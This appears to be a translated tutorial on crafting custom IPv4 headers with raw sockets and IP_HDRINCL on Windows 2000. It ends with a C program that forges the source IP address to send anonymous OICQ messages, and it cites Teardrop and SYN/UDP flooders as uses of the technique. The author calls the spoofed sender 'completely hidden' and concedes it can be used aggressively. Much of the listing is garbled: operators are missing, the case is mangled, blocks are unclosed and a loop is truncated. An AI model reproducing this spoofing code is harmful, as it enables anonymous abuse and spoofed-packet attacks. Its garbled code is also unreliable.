Implement your own defined IP header

zhaozj2021-02-11  166

We know that all TCP/IP network data is transmitted in IP packets: the data is encapsulated into an IP datagram consisting of an IP header and the data itself. In general, network software always generates IP headers whose length is a multiple of 32-bit words, even if the header has to be padded with extra zeros. The IP header contains all the information needed to deliver the data carried in the IP packet. The data structure and description of the IP header are as follows:

Member | Length (bits) | Description
Version | 4 | Version number of the IP header; currently IPv4, the latest is IPv6
Header Length | 4 | Length of the IP header; if there are no special options, the IP header is always 20 bytes long
Type of Service | 8 | Service type; defines the priority, latency, throughput and reliability of the data transmission
Total Packet Length | 16 | Length of the IP packet; if there is no special option, generally 20 bytes long
Identification | 16 | Identifier of the IP packet; the host uses it to uniquely identify each datagram it sends
Flag | 3 | IP data fragmentation flags
Fragment Offset | 13 | IP data fragmentation offset
Time to Live | 8 | Lifetime of the datagram on the network; every router decrements this value by one
Protocol | 8 | TCP/IP protocol type, e.g. ICMP is 1, IGMP is 2, TCP is 6, UDP is 17
Header Checksum | 16 | Header checksum
Source IP Address | 32 | Source IP address
Destination IP Address | 32 | Destination IP address
Other | ? | Other options
Data | ? | Data

Implementing your own IP header is a very meaningful exercise. For example, by changing the TOS priority and the TTL in the IP header you can give your packets stronger transmission capability and a longer lifetime, and by modifying the source IP address in the IP header you can hide the IP address of your machine, and so on. The famous attack program "Teardrop" works by deliberately crafting fragmented IP packets that the target system cannot handle, and SYN flooders and UDP flooders deceive the target by generating random source IP addresses. Note that a forged source address only works one way: any reply goes to the forged address rather than to the sender, and networks that validate source addresses (ingress filtering, BCP 38) drop such packets.

Third, the principle of implementation

In general, a custom IP header is implemented with the IP_HDRINCL option of the socket library function setsockopt(). This is easy on UNIX and Linux platforms, but unfortunately setsockopt() in the Winsock 1.1 and Winsock 2.0 libraries on Windows does not support the IP_HDRINCL option, so on Windows 9x/NT a custom IP header cannot be implemented through the Winsock library. It can of course be done by writing a virtual device driver, but that is more complicated. The arrival of Windows 2000 changed this situation: its Winsock 2.2 library fully supports the IP_HDRINCL option of setsockopt(), so a custom IP header is easy to implement. (Raw sockets require administrator privileges, and later desktop releases starting with Windows XP SP2 restrict them: UDP datagrams whose source address does not belong to a local interface are dropped, and TCP data cannot be sent over raw sockets.) The implementation method is as follows:

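SOCKET s;
BOOL bOpt = TRUE;   /* non-zero: the application supplies the IP header itself */
int ret;

/* A raw socket is needed before IP_HDRINCL can be set; creating one
 * requires administrator privileges. */
s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED);
if (s == INVALID_SOCKET) {
    /* handle the failure; WSAGetLastError() returns the reason */
}

/* setsockopt() takes a pointer to the option value and the value's size,
 * so pass the ADDRESS of bOpt (an initialised BOOL), not bOpt itself. */
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
if (ret == SOCKET_ERROR) {
    /* the stack refused the option; WSAGetLastError() returns the reason */
}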

Fourth, instance

To help everyone learn to construct their own IP header data as quickly as possible, here is a complete example. Its function is: given only the other party's IP address, it sends a "Hello!" message to the other party's OICQ client, and because the IP header of the packet is modified, the sender's IP address is completely hidden, which means you can build a fully anonymous OICQ sender. Of course, if this is done with malicious intent, you bear the consequences yourself. The source code is as follows: / *************************************************** ********************************** /

/ * OICQSEND.C * /

/* This program was compiled with Visual C++ 6.0 and debugged on Windows 2000 Advanced Server */

/ * Created by janker@371.net 2000.8.28 * /

/* Disclaimer: this program can be used aggressively; if you modify it into an attack program, you do so at your own risk */

/ ************************************************** ********************* /

#pragma pack (1)

#define Win32_Lean_and_mean

#include #include

#include #include #include

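/*
 * Sizes and addressing constants for the example. Each directive is on its
 * own line (the listing had them collapsed onto one line as "# Define",
 * which the preprocessor rejects), and the names are spelled the way
 * main() references them.
 */
#define OICQ_MAX_PACKET 1024   /* size of the packet assembly buffer */
#define OICQ_MAX_MSG    512    /* not referenced by the visible code */
#define OICQ_MSG_LEN    45     /* number of bytes in the message array */

/*
 * Value that main() writes into the IP header's source-address field.
 * It is not read from a local interface, so the receiver cannot answer
 * the real sender; 127.0.0.1 is a loopback address.
 */
#define src_ip   "127.0.0.1"
#define SRC_PORT 5277          /* UDP source port placed in the UDP header */
#define DST_PORT 4000          /* UDP destination port placed in the UDP header */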

/*
 * IPv4 header without options, laid out field by field in wire order.
 * The members add up to 20 bytes; multi-byte members are expected to be
 * stored in network byte order by the code that fills them in.
 */
typedef struct ip_hdr {
    unsigned char  ip_verlen;       /* version (high 4 bits) and header length (low 4 bits) */
    unsigned char  ip_tos;          /* type of service */
    unsigned short ip_totallength;  /* total packet length */
    unsigned short ip_id;           /* identification */
    unsigned short ip_offset;       /* flags and fragment offset */
    unsigned char  ip_ttl;          /* time to live */
    unsigned char  ip_protocol;     /* protocol number (1 ICMP, 6 TCP, 17 UDP) */
    unsigned short ip_checksum;     /* header checksum */
    unsigned int   ip_srcaddr;      /* source IP address */
    unsigned int   ip_destaddr;     /* destination IP address */
} IP_HDR;

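/*
 * UDP header: four 16-bit fields, 8 bytes in total. The keyword is spelled
 * `typedef` (the listing had "Typedef") and the type is named UDP_HDR,
 * which is the name main() declares its variable with and matches IP_HDR.
 */
typedef struct udp_hdr {
    unsigned short src_portno;    /* source port */
    unsigned short dst_portno;    /* destination port */
    unsigned short udp_length;    /* length of UDP header plus data */
    unsigned short udp_checksum;  /* checksum over pseudo-header, header and data */
} UDP_HDR;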

CHAR STRMESSAGE [OICQ_MSG_LEN] = {0x02, 0x01, 0x07, 0x00, 0x78, 0x00, 0x00, 0X31, 0X30, 0X30, 0X30, 0X31, 0X1F, 0X30, 0X1F, 0X30, 0X30, 0X1F, 0X32, 0X30, 0X30, 0X3000 0x2D, ​​0x30, 0x31, 0x2D, ​​0x30, 0x31, 0x1F, 0X30, 0X30, 0X3A, 0X30, 0X30, 0X3A, 0X30, 0X30, 0X1F, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x21, 0x03};

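/**
 * Compute the 16-bit one's-complement checksum used by IP and UDP.
 *
 * The listing had lost the "+=" and "++" operators and the closing brace,
 * so the sum was never accumulated and the function did not compile; they
 * are restored here. `unsigned short` / `unsigned char` are the types the
 * Windows USHORT / UCHAR typedefs name.
 *
 * @param buffer  start of the data, read as 16-bit words in memory order
 * @param size    number of bytes to cover; a trailing odd byte is added as-is
 * @return        the bitwise complement of the folded 16-bit sum
 *
 * The accumulator is an unsigned long, which is 32 bits wide on Windows, so
 * inputs must stay well below 128 KiB for the sum not to wrap.
 */
unsigned short Checksum(unsigned short *buffer, int size)
{
    unsigned long cksum = 0;

    /* Add the data one 16-bit word at a time. */
    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }

    /* One byte left over when size is odd. */
    if (size > 0) {
        cksum += *(unsigned char *)buffer;
    }

    /* Fold the carries back into the low 16 bits until none remain. */
    while (cksum >> 16) {
        cksum = (cksum >> 16) + (cksum & 0xffff);
    }

    return (unsigned short)~cksum;
}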

/*
 * Entry point of the article's example. It expects exactly one argument,
 * the destination IP address, builds an IP header, a UDP header and a fixed
 * message in a local buffer, and hands the result to a raw socket that has
 * IP_HDRINCL set.
 *
 * NOTE(review): this listing was damaged in extraction. Identifiers changed
 * case, operators such as "+=", "++" and "+" are missing, the block opened
 * by the argc test is never closed and the for-loop header is truncated, so
 * the code does not compile as shown. The comments below describe what the
 * visible statements appear to intend.
 */
int main (int argc, char ** argv) {WSADATA wsd; SOCKET s; BOOL bOpt; struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; DWORD i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf [icq_max_packet], * ptr = NULL;

Printf ("Spoof OICQ Msg Sender - by Janker@371.NET/N/N");

/* Usage check: anything other than one argument prints the usage line and exits. */
IF (argc! = 2) {Printf ("usage: OICQsend Destination_ip_address"); EXITPROCESS (1);

/* NOTE(review): the seed passed to srand() is NULL, a constant, so rand()
 * produces the same sequence on every run; byte 5 of the message is then
 * not actually random. */
SRAND (NULL); StrMessage [5] = rand ();

/* Start Winsock 2.2, open a raw UDP socket and enable IP_HDRINCL so that the
 * buffer passed to sendto() is taken to begin with an IP header. Each step
 * returns -1 on failure after printing the error code. */
IF (WSAStartup (MakeWord (2, 2), & WSD)! = 0) {Printf ("WSAStartup () FAILED:% D / N", getLastError ()); return -1;} s = WSASASOCKET (AF_INET, SOCK_RAW, Ipproto_udp, null, 0, 0); if (s == invalid_socket) {printf ("WSASOCKET () FAILED:% D / N", wsagetlasterror ()); return -1;} Bopt = true; ret = setsockopt (S , Ipproto_ip, ip_hdrincl, (char *) & bopt, sizeof (bopt)); if (RET == Socket_ERROR) {Printf ("Setsockopt (ip_hdrincl) Failed:% D / N", wsagetlasterror ()); return -1;}

/* Total datagram size: presumably the sum of the three terms (the "+" signs are missing). */
ITOTALSIZE = SIZEOF (IPHDR) SIZEOF (UDPHDR) OICQ_MSG_LEN;

/* Header length expressed in units of sizeof(unsigned long); assumes a 4-byte unsigned long. */
IIPVersion = 4; IIPSIZE = SizeOf (iPhdr) / SizeOf (unsigned long);

/* Fill in the IP header: TTL 128, protocol 0x11 (17, UDP), checksum left at 0
 * and not computed anywhere in the visible code. ip_srcaddr comes from the
 * src_ip macro instead of a local interface, so the header carries a source
 * address the sender does not own: replies cannot reach the sender, and
 * source-address validation on the path or on the host drops such datagrams. */
ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; ipHdr.ip_totallength = htons (iTotalSize); ipHdr.ip_id = 0; ipHdr.ip_offset = 0; ipHdr.ip_ttl = 128; ipHdr.ip_protocol = 0x11; iphdr.ip_checksum = 0; iphdr.ip_srcaddr = inet_addr (src_ip); iphdr.ip_destaddr = inet_addr (Argv [1]);

/* Fill in the UDP header; the checksum field is zero while the checksum is computed. */
iUdpSize = sizeof (udpHdr) OICQ_MSG_LEN; udpHdr.src_portno = htons (SRC_PORT); udpHdr.dst_portno = htons (DST_PORT); udpHdr.udp_length = htons (iUdpSize); udpHdr.udp_checksum = 0;

/* The next statements assemble the UDP checksum input in buf: source address,
 * destination address, one zero byte, the protocol byte and the UDP length
 * (the pseudo-header), followed by the UDP header and the message bytes.
 * The counter statements have lost their "+=" operators. */
Iudpchecksumsize = 0; ptr = buf; zeromeMory (buf, OICQ_MAX_PACKET);

Memcpy (PTR, & iPhdr.ip_srcaddr, sizeof (iphdr.ip_srcaddr); PTR = SIZEOF (iPhdr.ip_srcaddr); Iudpchecksumsize = SizeOf (iPhdr.ip_srcaddr);

Memcpy (PTR, & iPhdr.ip_destaddr, sizeof (iPhdr.ip_destaddr)); PTR = SIZEOF (iPhdr.ip_DestAddr); IudpChecksumsize = SizeOf (iPhdr.ip_DestAddr);

PTR ; Iudpchecksumsize = 1;

Memcpy (PTR, & iPhdr.ip_protocol, sizeof (iPhdr.ip_Protocol); PTR = SizeOf (iPhdr.ip_Protocol); Iudpchecksumsize = SizeOf (iPhdr.ip_protocol);

Memcpy (PTR, & UDPHDR.UDP_LENGTH, SIZEOF (udphdr.udp_length); PTR = SizeOf (udphdr.udp_length); Iudpchecksumsize = SizeOf (udphdr.udp_length);

Memcpy (PTR, & UDPHDR, SIZEOF (UDPHDR)); PTR = SizeOf (UDphDR); Iudpchecksumsize = SizeOf (UDphdr);

/* NOTE(review): the loop condition and increment were lost; presumably this
 * copied OICQ_MSG_LEN message bytes into buf. */
For (i = 0; i * ptr = strMessage [i]; Iudpchecksumsize = OICQ_MSG_LEN;

/* Checksum the assembled bytes and store the result in the UDP header. */
CKSUM = Checksum ((Ushort *) BUF, IUDPCHECKSUMSIZE); udphdr.udp_checksum = cksum;

/* Reuse buf for the datagram that is actually sent: IP header, UDP header, message. */
ZeromeMory (BUF, OICQ_MAX_PACKET); PTR = BUF;

Memcpy (PTR, & IPHDR, SIZEOF (IPHDR)); PTR = SIZEOF (IPHDR); Memcpy (PTR, & UDPHDR, SIZEOF (UDphdr)); PTR = SizeOf (UDphdr); Memcpy (PTR, StrMessage, OICQ_MSG_LEN);

/* Destination for sendto(): the address given on the command line, port DST_PORT. */
Remote.sin_Family = AF_INET; Remote.SIN_PORT = HTONS (DST_PORT); Remote.sin_Addr.s_addr = inet_addr (argv [1]);

/* Send once, report the outcome, then close the socket and shut Winsock down. */
RET = Sendto (S, BUF, ITATALSIZE, 0, (SockAddr *) & Remote, SizeOf (Remote)); if (RET == Socket_ERROR) Printf ("Sendto () FAILED:% D / N", wsagetlasterror ()); Else Printf ("Send OK!"); CloseSocket (s); wsacleanup (); return 0;}
